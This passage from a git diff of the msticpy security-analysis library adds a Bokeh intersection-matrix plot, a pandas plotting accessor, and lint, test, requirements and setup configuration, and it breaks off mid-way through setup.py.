+    sort_x: Optional[Union[str, bool]] = None
+    sort_y: Optional[Union[str, bool]] = None
+    hide: bool = False
+    font_size: Optional[int] = None
+    max_label_font_size: int = 11
+
+    @property
+    def x_column(self) -> Optional[str]:
+        """Return the current x column value."""
+        return self.x or self.x_col
+
+    @property
+    def y_column(self) -> Optional[str]:
+        """Return the current y column value."""
+        return self.y or self.y_col
+
+    @classmethod
+    def field_list(cls) -> List[str]:
+        """Return field names as a list."""
+        return list(attr.fields_dict(cls).keys())
+
+
+def plot_matrix(data: pd.DataFrame, **kwargs) -> LayoutDOM:
+    """
+    Plot data as an intersection matrix.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        The data to plot.
+    x : str
+        Column to plot on the x (horizontal) axis
+    x_col : str
+        Alias for 'x'
+    y : str
+        Column to plot on the y (vertical) axis
+    y_col : str
+        Alias for 'y'
+    title : str, optional
+        Custom title, default is 'Intersection plot'
+    value_col : str, optional
+        Column from the DataFrame used to size the intersection points.
+    dist_count : bool, optional
+        Calculates a count of distinct values (from `value_col`) and uses
+        this to size the intersection points.
+        Requires `value_col` to be specified.
+    log_size : bool, optional
+        Takes the log of the size value before calculating the intersection
+        display point size.
+        Can be combined with `invert`.
+    invert : bool, optional
+        Takes the inverse of the size value as the basis for calculating
+        the intersection display point size. This is useful for highlighting
+        rare interactions.
+        Can be combined with `log_size`.
+    intersect : bool, optional
+        Plots points of a fixed size, rather than using a sizing value. This
+        is useful for just showing the presence/absence of an interaction.
+    height : int, optional
+        The plot height. Default is 700
+    width : int
+        The plot width. Default is 900
+    color : str
+        The color of the plotted points, default is "red"
+    sort : Union[str, bool], optional
+        Sorts the labels of both axes, default is None.
+        Acceptable values are:
+        'asc' (or string starting with 'asc') - Sort ascending
+        'desc' (or string starting with 'asc') - Sort descending
+        False or None (no sort)
+        True  - Sort ascending
+    sort_x : str, optional
+        Sorts the labels of the x axis (takes precedence over `sort`),
+        default is None.
+        Acceptable values are:
+        'asc' (or string starting with 'asc') - Sort ascending
+        'desc' (or string starting with 'asc') - Sort descending
+        False or None (no sort)
+        True  - Sort ascending
+    sort_y : str, optional
+        Sorts the labels of the y axis (takes precedence over `sort`),
+        default is None.
+        Acceptable values are:
+        'asc' (or string starting with 'asc') - Sort ascending
+        'desc' (or string starting with 'asc') - Sort descending
+        False or None (no sort)
+        True  - Sort ascending
+    hide : bool, optional
+        Creates and returns but does not display the plot, default
+        is False.
+    font_size : int, optional
+        Manually specify the font size for axis labels, in points,
+        the default is to automatically calculate a size based on the
+        number of items in each axis.
+    max_label_font_size : int, optional
+        The maximum size, in points, of the X and Y labels, default is 11.
+
+
+    Returns
+    -------
+    LayoutDOM
+        The Bokeh plot
+
+    """
+    # Process/extract parameters
+    check_kwargs(kwargs, PlotParams.field_list())
+    param = PlotParams(**kwargs)
+
+    if not param.x_column or not param.y_column:
+        raise ValueError("Must supply `x` and `y` column parameters.")
+
+    reset_output()
+    output_notebook()
+
+    plot_data = _prep_data(data, param)
+
+    x_range = _sort_labels(plot_data, param.x_column, param.sort_x or param.sort)
+    y_range = _sort_labels(
+        plot_data, param.y_column, param.sort_y or param.sort, invert=True
+    )
+
+    # Rescale the size so that it matches the graph
+    max_size = plot_data["size"].max()
+    plot_data["plt_size"] = plot_data["size"] * 10 / max_size
+    source = ColumnDataSource(data=plot_data)
+
+    plot = figure(
+        title=param.title,
+        plot_width=param.width,
+        plot_height=param.height,
+        x_range=x_range,
+        y_range=y_range,
+        tools=["wheel_zoom", "box_zoom", "pan", "reset", "save"],
+        toolbar_location="above",
+    )
+
+    tool_tips = [
+        (param.x_column, f"@{param.x_column}"),
+        (param.y_column, f"@{param.y_column}"),
+        ("value", "@size"),
+    ]
+    plot.add_tools(HoverTool(tooltips=tool_tips))
+
+    if param.intersect:
+        plot.circle_cross(
+            x=param.x_column,
+            y=param.y_column,
+            source=source,
+            fill_alpha=0.6,
+            line_color=param.color,
+            size=5,
+        )
+    else:
+        plot.circle(
+            x=param.x_column,
+            y=param.y_column,
+            source=source,
+            fill_alpha=0.6,
+            fill_color=param.color,
+            size="plt_size",
+        )
+    _set_plot_params(plot)
+
+    # Calculate appropriate font size for labels
+    x_label_pt_size = param.font_size or max(
+        5,
+        min(
+            param.max_label_font_size,
+            int(param.width * 0.6 / plot_data[param.x_column].nunique()),
+        ),
+    )
+    y_label_pt_size = param.font_size or max(
+        5,
+        min(
+            param.max_label_font_size,
+            int(param.height * 0.6 / plot_data[param.y_column].nunique()),
+        ),
+    )
+    plot.xaxis.major_label_text_font_size = f"{x_label_pt_size}pt"
+    plot.yaxis.major_label_text_font_size = f"{y_label_pt_size}pt"
+    plot.xaxis.axis_label = param.x_column
+    plot.yaxis.axis_label = param.y_column
+
+    if not param.hide:
+        show(plot)
+    return plot
+
+
+def _set_plot_params(plot):
+    plot.title.text_font_size = "15pt"
+    plot.outline_line_color = None
+    plot.grid.grid_line_color = "navy"
+    plot.grid.grid_line_alpha = 0.1
+    plot.axis.axis_line_color = None
+    plot.axis.major_tick_line_color = None
+    plot.xaxis.major_label_orientation = math.pi / 2
+    plot.xgrid.visible = True
+    plot.ygrid.visible = True
+    plot.axis.major_label_standoff = 0
+
+
+def _sort_labels(data, column, sort_arg, invert=False):
+    """Sort the labels if required."""
+    if sort_arg:
+        if isinstance(sort_arg, str):
+            sort_order = sort_arg.casefold().startswith("asc")
+        else:
+            sort_order = True
+        sort_order = not sort_order if invert else sort_order
+        return data[column].sort_values(ascending=sort_order).unique().tolist()
+    return data[column].unique().tolist()
+
+
+def _prep_data(data: pd.DataFrame, param: PlotParams):
+    """Process the data to create size column."""
+
+    def _size_scale(value_series, log_size, invert):
+        # local function to scale values
+        if invert:
+            # If invert, calculate inverse values on same
+            # scale as input
+            max_size = value_series.max()
+            # min_size = value_series.min()
+            value_series = (max_size) / value_series
+        if log_size:
+            # calc log of values, if requested
+            return np.log(value_series)
+        return value_series
+
+    if param.value_col is None:
+        # calculate a count of rows in each group
+        other_cols = list(set(data.columns) - set([param.x_column, param.y_column]))
+        if other_cols:
+            count_col = other_cols[0]
+        else:
+            count_col = data.index.name or "index"
+            data = data.reset_index()
+        count_rows_df = (
+            data[[param.x_column, param.y_column, count_col]]
+            .groupby([param.x_column, param.y_column])
+            .count()
+            .rename(columns={count_col: "row_count"})
+            .reset_index()
+        )
+        return count_rows_df.assign(
+            size=_size_scale(count_rows_df.row_count, param.log_size, param.invert)
+        )
+
+    # if value column was specified, use that
+    if param.dist_count:
+        # If distinct count of values required, get nunique
+        tmp_df = (
+            data[[param.x_column, param.y_column, param.value_col]]
+            .groupby([param.x_column, param.y_column])
+            .nunique()
+            .reset_index()
+        )
+    else:
+        tmp_df = (
+            data[[param.x_column, param.y_column, param.value_col]]
+            .groupby([param.x_column, param.y_column])
+            .sum()
+            .reset_index()
+        )
+    return tmp_df.assign(
+        size=lambda x: _size_scale(
+            tmp_df[param.value_col], param.log_size, param.invert
+        )
+    )
diff --git a/msticpy/vis/mp_pandas_plot.py b/msticpy/vis/mp_pandas_plot.py
new file mode 100644
index 000000000..2e1f74d80
--- /dev/null
+++ b/msticpy/vis/mp_pandas_plot.py
@@ -0,0 +1,406 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+from typing import Iterable, Optional, Tuple, Union
+
+import pandas as pd
+from bokeh.models import LayoutDOM
+from bokeh.plotting import figure
+
+from .._version import VERSION
+from ..common.exceptions import MsticpyUserError
+from ..nbtools.process_tree import build_and_show_process_tree
+from ..nbtools.timeline import display_timeline, display_timeline_values
+from ..nbtools.timeline_duration import display_timeline_duration
+from .entity_graph_tools import EntityGraph, req_alert_cols, req_inc_cols
+from .matrix_plot import plot_matrix
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+@pd.api.extensions.register_dataframe_accessor("mp_plot")
+class MsticpyPlotAccessor:
+    """Pandas api extension for MSTICPy visualizations."""
+
+    def __init__(self, pandas_obj):
+        """Instantiate pandas extension class."""
+        self._df = pandas_obj
+
+    def timeline(self, **kwargs) -> LayoutDOM:
+        """
+        Display a timeline of events.
+
+        Parameters
+        ----------
+        time_column : str, optional
+            Name of the timestamp column
+            (the default is 'TimeGenerated')
+        source_columns : list, optional
+            List of default source columns to use in tooltips
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        title : str, optional
+            Title to display (the default is None)
+        alert : SecurityAlert, optional
+            Add a reference line/label using the alert time (the default is None)
+        ref_event : Any, optional
+            Add a reference line/label using the alert time (the default is None)
+        ref_time : datetime, optional
+            Add a reference line/label using `ref_time` (the default is None)
+        group_by : str
+            The column to group timelines on.
+        legend: str, optional
+            "left", "right", "inline" or "none"
+            (the default is to show a legend when plotting multiple series
+            and not to show one when plotting a single series)
+        yaxis : bool, optional
+            Whether to show the yaxis and labels (default is False)
+        ygrid : bool, optional
+            Whether to show the yaxis grid (default is False)
+        xgrid : bool, optional
+            Whether to show the xaxis grid (default is True)
+        range_tool : bool, optional
+            Show the the range slider tool (default is True)
+        height : int, optional
+            The height of the plot figure
+            (the default is auto-calculated height)
+        width : int, optional
+            The width of the plot figure (the default is 900)
+        color : str
+            Default series color (default is "navy")
+        overlay_data : pd.DataFrame:
+            A second dataframe to plot as a different series.
+        overlay_color : str
+            Overlay series color (default is "green")
+        ref_events : pd.DataFrame, optional
+            Add references line/label using the event times in the dataframe.
+            (the default is None)
+        ref_time_col : str, optional
+            Add references line/label using the this column in `ref_events`
+            for the time value (x-axis).
+            (this defaults the value of the `time_column` parameter or 'TimeGenerated'
+            `time_column` is None)
+        ref_col : str, optional
+            The column name to use for the label from `ref_events`
+            (the default is None)
+        ref_times : List[Tuple[datetime, str]], optional
+            Add one or more reference line/label using (the default is None)
+
+        Returns
+        -------
+        LayoutDOM
+            The bokeh plot figure.
+
+        """
+        return display_timeline(data=self._df, **kwargs)
+
+    # pylint: disable=invalid-name
+    def timeline_values(self, value_col: str = None, **kwargs) -> LayoutDOM:
+        """
+        Display a timeline of events.
+
+        Parameters
+        ----------
+        time_column : str, optional
+            Name of the timestamp column
+            (the default is 'TimeGenerated')
+        value_col : str
+            The column name holding the value to plot vertically
+        source_columns : list, optional
+            List of default source columns to use in tooltips
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        x : str, optional
+            alias of `time_column`
+        y : str, optional
+            alias of `value_col`
+        title : str, optional
+            Title to display (the default is None)
+        ref_event : Any, optional
+            Add a reference line/label using the alert time (the default is None)
+        ref_time : datetime, optional
+            Add a reference line/label using `ref_time` (the default is None)
+        ref_label : str, optional
+            A label for the `ref_event` or `ref_time` reference item
+        group_by : str
+            (where `data` is a DataFrame)
+            The column to group timelines on
+        legend: str, optional
+            "left", "right", "inline" or "none"
+            (the default is to show a legend when plotting multiple series
+            and not to show one when plotting a single series)
+        yaxis : bool, optional
+            Whether to show the yaxis and labels
+        range_tool : bool, optional
+            Show the the range slider tool (default is True)
+        height : int, optional
+            The height of the plot figure
+            (the default is auto-calculated height)
+        width : int, optional
+            The width of the plot figure (the default is 900)
+        color : str
+            Default series color (default is "navy"). This is overridden by
+            automatic color assignments if plotting a grouped chart
+        kind : Union[str, List[str]]
+            one or more glyph types to plot., optional
+            Supported types are "circle", "line" and "vbar" (default is "vbar")
+        ref_events : pd.DataFrame, optional
+            Add references line/label using the event times in the dataframe.
+            (the default is None)
+        ref_time_col : str, optional
+            Add references line/label using the this column in `ref_events`
+            for the time value (x-axis).
+            (this defaults the value of the `time_column` parameter or 'TimeGenerated'
+            `time_column` is None)
+        ref_col : str, optional
+            The column name to use for the label from `ref_events`
+            (the default is None)
+        ref_times : List[Tuple[datetime, str]], optional
+            Add one or more reference line/label using (the default is None)
+
+        Returns
+        -------
+        LayoutDOM
+            The bokeh plot figure.
+
+        """
+        return display_timeline_values(data=self._df, value_col=value_col, **kwargs)
+
+    def timeline_duration(
+        self,
+        group_by: Union[Iterable[str], str],
+        time_column: str = "TimeGenerated",
+        end_time_column: Optional[str] = None,
+        **kwargs,
+    ) -> LayoutDOM:  # noqa: C901, MC0001
+        """
+        Display a duration timeline of events grouped by one or more columns.
+
+        Parameters
+        ----------
+        group_by : Union[Iterable[str], str]
+            The column name or iterable of column names to group the data by.
+        time_column : str
+            Primary time column - will be used to calculate the
+            start time of the duration for each group.
+            If `end_time_column` is not specified it will also be used to
+            calculate the end time.
+        end_time_column : Optional[str]
+            If supplied, it will be used to calculate the end time
+            of the duration for each group.
+
+        Other Parameters
+        ----------------
+        title : str, optional
+            Title to display (the default is None)
+        ylabel_cols : Optional[Iterable[str]], optional
+            The subset of the group columns to use for the y-axis labels.
+        yaxis : bool, optional
+            Whether to show the yaxis and labels
+        range_tool : bool, optional
+            Show the the range slider tool (default is True)
+        source_columns : list, optional
+            List of default source columns to use in tooltips
+            (the default is None)
+        height : int, optional
+            The height of the plot figure
+            (the default is auto-calculated height)
+        width : int, optional
+            The width of the plot figure (the default is 900)
+        color : str
+            Default series color (default is "navy")
+        ref_events : pd.DataFrame, optional
+            Add references line/label using the event times in the dataframe.
+            (the default is None)
+        ref_col : str, optional
+            The column name to use for the label from `ref_events`
+            (the default is None)
+        ref_times : List[Tuple[datetime, str]], optional
+            Add one or more reference line/label using (the default is None)
+
+        Returns
+        -------
+        LayoutDOM
+            The bokeh plot figure.
+
+        """
+        return display_timeline_duration(
+            data=self._df,
+            group_by=group_by,
+            time_column=time_column,
+            end_time_column=end_time_column,
+            **kwargs,
+        )
+
+    def process_tree(self, **kwargs) -> Tuple[figure, LayoutDOM]:
+        """
+        Build and plot a process tree.
+
+        Parameters
+        ----------
+        schema : ProcSchema, optional
+            The data schema to use for the data set, by default None
+            (if None the schema is inferred)
+        output_var : str, optional
+            Output variable for selected items in the tree,
+            by default None
+        legend_col : str, optional
+            The column used to color the tree items, by default None
+        show_table: bool
+            Set to True to show a data table, by default False.
+
+        Other Parameters
+        ----------------
+        height : int, optional
+            The height of the plot figure
+            (the default is 700)
+        width : int, optional
+            The width of the plot figure (the default is 900)
+        title : str, optional
+            Title to display (the default is None)
+        hide_legend : bool, optional
+            Hide the legend box, even if legend_col is specified.
+        pid_fmt : str, optional
+            Display Process ID as 'dec' (decimal) or 'hex' (hexadecimal),
+            default is 'hex'.
+
+        Returns
+        -------
+        Tuple[figure, LayoutDOM]:
+            figure - The main bokeh.plotting.figure
+            Layout - Bokeh layout structure.
+
+        """
+        return build_and_show_process_tree(data=self._df, **kwargs)
+
+    def matrix(self, **kwargs) -> LayoutDOM:
+        """
+        Plot data as an intersection matrix.
+
+        Parameters
+        ----------
+        data : pd.DataFrame
+            The data to plot.
+        x : str
+            Column to plot on the x (horizontal) axis
+        x_col : str
+            Alias for 'x'
+        y : str
+            Column to plot on the y (vertical) axis
+        y_col : str
+            Alias for 'y'
+        title : str, optional
+            Custom title, default is 'Intersection plot'
+        value_col : str, optional
+            Column from the DataFrame used to size the intersection points.
+        dist_count : bool, optional
+            Calculates a count of distinct values (from `value_col`) and uses
+            this to size the intersection points.
+            Requires `value_col` to be specified.
+        log_size : bool, optional
+            Takes the log of the size value before calculating the intersection
+            display point size.
+            Can be combined with `invert`.
+        invert : bool, optional
+            Takes the inverse of the size value as the basis for calculating
+            the intersection display point size. This is useful for highlighting
+            rare interactions.
+            Can be combined with `log_size`.
+        intersect : bool, optional
+            Plots points of a fixed size, rather than using a sizing value. This
+            is useful for just showing the presence/absence of an interaction.
+        height : int, optional
+            The plot height. Default is 700
+        width : int
+            The plot width. Default is 900
+        color : str
+            The color of the plotted points, default is "red"
+        sort : Union[str, bool], optional
+            Sorts the labels of both axes, default is None.
+            Acceptable values are:
+            'asc' (or string starting with 'asc') - Sort ascending
+            'desc' (or string starting with 'asc') - Sort descending
+            False or None (no sort)
+            True  - Sort ascending
+        sort_x : str, optional
+            Sorts the labels of the x axis (takes precedence over `sort`),
+            default is None.
+            Acceptable values are:
+            'asc' (or string starting with 'asc') - Sort ascending
+            'desc' (or string starting with 'asc') - Sort descending
+            False or None (no sort)
+            True  - Sort ascending
+        sort_y : str, optional
+            Sorts the labels of the y axis (takes precedence over `sort`),
+            default is None.
+            Acceptable values are:
+            'asc' (or string starting with 'asc') - Sort ascending
+            'desc' (or string starting with 'asc') - Sort descending
+            False or None (no sort)
+            True  - Sort ascending
+        hide : bool, optional
+            Creates and returns but does not display the plot, default
+            is False.
+        font_size : int, optional
+            Manually specify the font size for axis labels, the
+            default is to automatically calculate a size based on the
+            number of items in each axis.
+        max_label_font_size : int, optional
+            The maximum size, in points, of the X and Y labels, default is 11.
+
+
+        Returns
+        -------
+        LayoutDOM
+            The Bokeh plot
+
+        """
+        return plot_matrix(data=self._df, **kwargs)
+
+    def incident_graph(
+        self, timeline: bool = False, hide: bool = False, **kwargs
+    ) -> LayoutDOM:
+        """
+        Plot an incident graph if the dataframe contains incidents or alerts.
+
+        Parameters
+        ----------
+        timeline : bool, optional
+            True to plot the entity timeline, by default False
+        hide : bool, optional
+            True to hide the plot, by default False
+
+        Other Parameters
+        ----------------
+        node_size : int, optional
+            Size of the nodes in pixels, by default 25
+        font_size : int, optional
+            Font size for node labels, by default 10
+            Can be an integer (point size) or a string (e.g. "10pt")
+        width : int, optional
+            Width in pixels, by default 800
+        height : int, optional
+            Image height (the default is 800)
+        scale : int, optional
+            Position scale (the default is 2)
+
+        Raises
+        ------
+        MsticpyUserError
+            Raised if the dataframe does not contain incidents or alerts.
+
+        """
+        if not all(elem in self._df.columns for elem in req_alert_cols) and any(
+            elem not in self._df.columns for elem in req_inc_cols
+        ):
+            raise MsticpyUserError("DataFrame must consist of Incidents or Alerts")
+        graph = EntityGraph(self._df)
+        return graph.plot(hide=hide, timeline=timeline, **kwargs)
diff --git a/mypy.ini b/mypy.ini
new file mode 100644
index 000000000..7cfc3bbbe
--- /dev/null
+++ b/mypy.ini
@@ -0,0 +1,129 @@
+[mypy]
+python_version = 3.6
+
+[mypy-setuptools.*]
+ignore_missing_imports = True
+
+[mypy-pandas.*]
+ignore_missing_imports = True
+
+[mypy-numpy.*]
+ignore_missing_imports = True
+
+[mypy-sklearn.*]
+ignore_missing_imports = True
+
+[mypy-matplotlib.*]
+ignore_missing_imports = True
+
+[mypy-IPython.*]
+ignore_missing_imports = True
+
+[mypy-deprecated.sphinx.*]
+ignore_missing_imports = True
+
+[mypy-ipywidgets.*]
+ignore_missing_imports = True
+
+[mypy-bokeh.*]
+ignore_missing_imports = True
+
+[mypy-networkx.*]
+ignore_missing_imports = True
+
+[mypy-urllib3.*]
+ignore_missing_imports = True
+
+[mypy-folium.*]
+ignore_missing_imports = True
+
+[mypy-tqdm.*]
+ignore_missing_imports = True
+
+[mypy-ipwhois.*]
+ignore_missing_imports = True
+
+[mypy-tldextract.*]
+ignore_missing_imports = True
+
+[mypy-cryptography.*]
+ignore_missing_imports = True
+
+[mypy-azure.*]
+ignore_missing_imports = True
+ignore_errors = True
+
+[mypy-adal.*]
+ignore_missing_imports = True
+
+[mypy-markdown.*]
+ignore_missing_imports = True
+
+[mypy-bs4.*]
+ignore_missing_imports = True
+
+[mypy-keyring.*]
+ignore_missing_imports = True
+
+[mypy-msrest.*]
+ignore_missing_imports = True
+
+[mypy-msrestazure.*]
+ignore_missing_imports = True
+
+[mypy-seaborn.*]
+ignore_missing_imports = True
+
+[mypy-scipy.*]
+ignore_missing_imports = True
+
+[mypy-statsmodels.*]
+ignore_missing_imports = True
+
+[mypy-Kqlmagic.*]
+ignore_missing_imports = True
+
+[mypy-splunklib.*]
+ignore_missing_imports = True
+
+[mypy-vt.*]
+ignore_missing_imports = True
+
+[mypy-vt_graph_api.*]
+ignore_missing_imports = True
+
+[mypy-msticnb.*]
+ignore_missing_imports = True
+
+[mypy-moz_sql_parser.*]
+ignore_missing_imports = True
+
+[mypy-pyperclip.*]
+ignore_missing_imports = True
+
+[mypy-yaml.*]
+ignore_missing_imports = True
+
+[mypy-httpx.*]
+ignore_missing_imports = True
+
+[mypy-pkg_resources.*]
+ignore_missing_imports = True
+
+[mypy-pytz.*]
+ignore_missing_imports = True
+
+[mypy-dateutil.*]
+ignore_missing_imports = True
+
+[mypy-gi.*]
+ignore_missing_imports = True
+
+[mypy-nbuser_settings.*]
+ignore_missing_imports = True
+
+[mypy-sumologic.*]
+ignore_missing_imports = True
+
+[mypy-passivetotal.*]
+ignore_missing_imports = True
\ No newline at end of file
diff --git a/prospector.yml b/prospector.yml
new file mode 100644
index 000000000..cc827865f
--- /dev/null
+++ b/prospector.yml
@@ -0,0 +1,38 @@
+# prospector configuration file
+
+---
+
+output-format: grouped
+
+strictness: veryhigh
+doc-warnings: true
+test-warnings: true
+member-warnings: false
+
+ignore-paths:
+  - docs
+  - tests
+
+pyroma:
+    run: true
+
+pep8:
+    full: true
+    disable: [
+      E501  # Line length handled by Black
+    ]
+
+pep257:
+    disable: [
+        # Disable because not part of PEP257 official convention:
+        # see http://pep257.readthedocs.io/en/latest/error_codes.html
+        D203,  # 1 blank line required before class docstring
+        D212,  # Multi-line docstring summary should start at the first line
+        D404,  # First word of the docstring should not be This
+        D416,  # Using numpy docstring standards
+    ]
+
+pylint:
+    disable:
+      - bad-continuation  # conflicts with Black formatting
+      - relative-beyond-top-level  # multiple false positives
diff --git a/pyproject.toml b/pyproject.toml
new file mode 100644
index 000000000..374b58cbf
--- /dev/null
+++ b/pyproject.toml
@@ -0,0 +1,6 @@
+[build-system]
+requires = [
+    "setuptools>=42",
+    "wheel"
+]
+build-backend = "setuptools.build_meta"
diff --git a/pytest.ini b/pytest.ini
new file mode 100644
index 000000000..6b59f2af3
--- /dev/null
+++ b/pytest.ini
@@ -0,0 +1,4 @@
+[pytest]
+markers =
+    notebook: Test runs a notebook - slow
+junit_family=legacy
diff --git a/requirements-all.txt b/requirements-all.txt
new file mode 100644
index 000000000..520fedcde
--- /dev/null
+++ b/requirements-all.txt
@@ -0,0 +1,54 @@
+attrs>=18.2.0
+azure-common>=1.1.18
+azure-core>=1.2.2
+azure-identity>=1.5.0
+azure-keyvault-secrets>=4.0.0
+azure-mgmt-compute>=4.6.2
+azure-mgmt-core>=1.2.1
+azure-mgmt-keyvault>=2.0.0
+azure-mgmt-monitor>=2.0.0
+azure-mgmt-network>=2.7.0
+azure-mgmt-resource>=16.1.0
+azure-mgmt-resourcegraph>=8.0.0
+azure-mgmt-subscription>=1.0.0
+azure-storage-blob>=12.5.0
+bokeh>=1.4.0
+cryptography>=3.1
+deprecated>=1.2.4
+dnspython<=2.0.0
+folium>=0.9.0
+geoip2>=2.9.0
+httpx>=0.21
+html5lib
+ipwhois>=1.1.0
+ipython>=7.23.1
+ipywidgets>=7.4.2
+keyring>=13.2.1
+KqlmagicCustom[jupyter-basic,auth_code_clipboard]>=0.1.114.dev26
+KqlmagicCustom[jupyter-extended]>=0.1.114.dev25
+lxml>=4.6.3
+matplotlib>=3.0.0
+moz_sql_parser>=4.5.0,<=4.11.21016
+msrest>=0.6.0
+msrestazure>=0.6.0
+nest_asyncio>=1.4.0
+networkx>=2.2
+numpy>=1.15.4  # pandas
+openpyxl>=3.0
+pandas>=1.1.5
+passivetotal>=2.5.3
+pygeohash>=1.2.0
+python-dateutil>=2.8.1  # pandas
+pytz>=2019.2  # pandas
+pyyaml>=3.13
+respx>=0.19.0
+scikit-learn>=0.20.2
+scipy>=1.1.0
+setuptools>=40.6.3
+splunk-sdk>=1.6.0
+statsmodels>=0.11.1
+sumologic-sdk>=0.1.11
+tldextract>=2.2.2
+tqdm>=4.36.1
+urllib3>=1.23
+vt-py>=0.6.1
\ No newline at end of file
diff --git a/requirements-dev.txt b/requirements-dev.txt
new file mode 100644
index 000000000..affecdd80
--- /dev/null
+++ b/requirements-dev.txt
@@ -0,0 +1,29 @@
+aiohttp>=3.7.4
+bandit>=1.7.0
+beautifulsoup4
+black>=20.8b1
+coverage>=5.5
+filelock>=3.0.0
+flake8>=3.8.4
+markdown>=3.3.4
+mccabe>=0.6.1
+mypy>=0.812
+nbdime>=2.1.0
+pandas>=1.2.5
+pep8-naming>=0.10.0
+pep8>=1.7.1
+pipreqs>=0.4.9
+pre-commit>=2.7.1
+prospector>=1.3.1
+pycodestyle>=2.6.0
+pydocstyle>=6.0.0
+pyflakes>=2.2.0
+pylint>=2.5.3
+pyroma>=3.1
+pytest-check>=1.0.1
+pytest-cov>=2.11.1
+pytest>=5.0.1
+respx==0.17.1
+sphinx>=2.1.2
+sphinx_rtd_theme>=0.5.1
+virtualenv
diff --git a/requirements.txt b/requirements.txt
index 7a3a3eea3..ed06ea144 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,16 +1,39 @@
-bokeh>=1.0.2
-matplotlib>=3.0.2
-seaborn>=0.9.0
-setuptools>=40.6.3
-maxminddb_geolite2>=2018.703
-urllib3>=1.24.1
-pandas>=0.23.4
-ipywidgets>=7.4.2
-numpy>=1.15.4
 attrs>=18.2.0
-requests>=2.21.0
+azure-common>=1.1.18
+azure-core>=1.2.2
+azure-identity>=1.5.0
+azure-mgmt-subscription>=1.0.0
+bokeh>=1.4.0
+cryptography>=3.1
+deprecated>=1.2.4
+dnspython<=2.0.0
+folium>=0.9.0
+geoip2>=2.9.0
+httpx>=0.21
+html5lib
+ipwhois>=1.1.0
+ipython>=7.23.1
+ipywidgets>=7.4.2
+# keyring>=13.2.1  # azure
+KqlmagicCustom[jupyter-basic,auth_code_clipboard]>=0.1.114.dev26
+lxml>=4.6.3
+matplotlib>=3.0.0
+msrest>=0.6.0
+msrestazure>=0.6.0
 networkx>=2.2
-ipython>=7.2.0
-Kqlmagic>=0.1.90
-scikit_learn>=0.20.2
-typing>=3.6.6
+numpy>=1.15.4  # pandas
+pandas>=1.1.5
+pygeohash>=1.2.0
+python-dateutil>=2.8.1  # pandas
+pytz>=2019.2  # pandas
+pyyaml>=3.13
+respx>=0.19.0
+# scikit-learn>=0.20.2  # scikit
+# scipy>=1.1.0  # timeseries
+# seaborn>=0.9.0
+setuptools>=40.6.3
+# splunk-sdk>=1.6.0  # splunk
+# statsmodels>=0.11.1  # timeseries
+tldextract>=2.2.2
+tqdm>=4.36.1
+urllib3>=1.23
diff --git a/setup.cfg b/setup.cfg
new file mode 100644
index 000000000..b1a2944a8
--- /dev/null
+++ b/setup.cfg
@@ -0,0 +1,59 @@
+[metadata]
+name = msticpy
+description = MSTIC Security Tools
+long_description = file: README.md
+long_description_content_type = text/markdown
+author = Ian Hellen
+author_email = ianhelle@microsoft.com
+maintainer = Pete Bryan
+maintainer_email = peter.bryan@microsoft.com
+keywords =
+    security
+    azure
+    sentinel
+    mstic
+    cybersec
+    infosec
+    cyber
+    cybersecurity
+    jupyter
+    notebooks
+    SOC
+    hunting
+license = MIT License
+classifiers =
+    Programming Language :: Python
+    Programming Language :: Python :: 3
+    Programming Language :: Python :: 3 :: Only
+    Programming Language :: Python :: 3.6
+    Programming Language :: Python :: 3.7
+    Programming Language :: Python :: 3.8
+    Programming Language :: Python :: 3.9
+    Programming Language :: Python :: 3.10
+    License :: OSI Approved :: MIT License
+    Operating System :: OS Independent
+    Development Status :: 5 - Production/Stable
+    Framework :: IPython
+    Framework :: Jupyter
+    Intended Audience :: Developers
+    Intended Audience :: Information Technology
+    Topic :: Security
+    Topic :: Software Development :: Libraries :: Python Modules
+
+url = https://github.com/microsoft/msticpy
+project_urls =
+    Documentation = https://msticpy.readthedocs.io
+    Code = https://github.com/microsoft/msticpy
+    Issue tracker = https://github.com/microsoft/msticpy/issues
+
+[options]
+zip_safe = False
+include_package_data = True
+package_dir =
+    msticpy = msticpy
+packages = find:
+python_requires = >=3.6
+
+[options.packages.find]
+include = msticpy*
+exclude = tests. tests*. *.tests.*
diff --git a/setup.py b/setup.py
index 38934e695..d87b0c05b 100644
--- a/setup.py
+++ b/setup.py
@@ -4,51 +4,69 @@
 # license information.
 # --------------------------------------------------------------------------
 """Setup script for msticpy."""
-
 import re
-
 import setuptools
 
-INSTALL_REQUIRES = ['matplotlib>=3.0.0',
-                    'bokeh>=1.0.2',
-                    'setuptools>=40.6.2',
-                    'attrs>=18.2.0',
-                    'pandas>=0.23.0',
-                    'requests>=2.20.1',
-                    'networkx>=2.2',
-                    'numpy>=1.12.0',
-                    'urllib3>=1.24.0',
-                    'ipywidgets>=7.4.2',
-                    'ipython>=7.1.1',
-                    'Kqlmagic>=0.1.90',
-                    'scikit_learn>=0.20.2',
-                    'maxminddb_geolite2>=2018.0',
-                    'typing>=3.6.6']
-
-
-# pylint: disable=locally-disabled, C0103
-with open("README.md", "r") as fh:
-    long_description = fh.read()
-# pylint: enable=locally-disabled, C0103
-
-with open("msticpy/_version.py", "r") as fd:
-    __version__ = re.search(r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]', fd.read(), re.MULTILINE).group(1)
-
-setuptools.setup(
-    name="msticpy",
-    version=__version__,
-    author="Ian Hellen",
-    author_email="ianhelle@microsoft.com",
-    description="MSTIC Security Tools",
-    long_description=long_description,
-    long_description_content_type="text/markdown",
-    url="https://https://github.com/ianhelle/msyticpy",
-    python_requires='>=3.6',
-    packages=setuptools.find_packages(exclude=['*.tests']),
-    classifiers=[
-        "Programming Language :: Python :: 3.6",
-        "License :: OSI Approved :: MIT License",
-        "Operating System :: OS Independent",
+with open("msticpy/_version.py", "r", encoding="utf-8") as fd:
+    v_match = re.search(r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]', fd.read(), re.MULTILINE)
+    __version__ = v_match.group(1) if v_match else "no version"
+
+with open("requirements.txt", "r", encoding="utf-8") as fh:
+    INSTALL_REQUIRES = fh.readlines()
+
+with open("requirements-dev.txt", "r", encoding="utf-8") as fh:
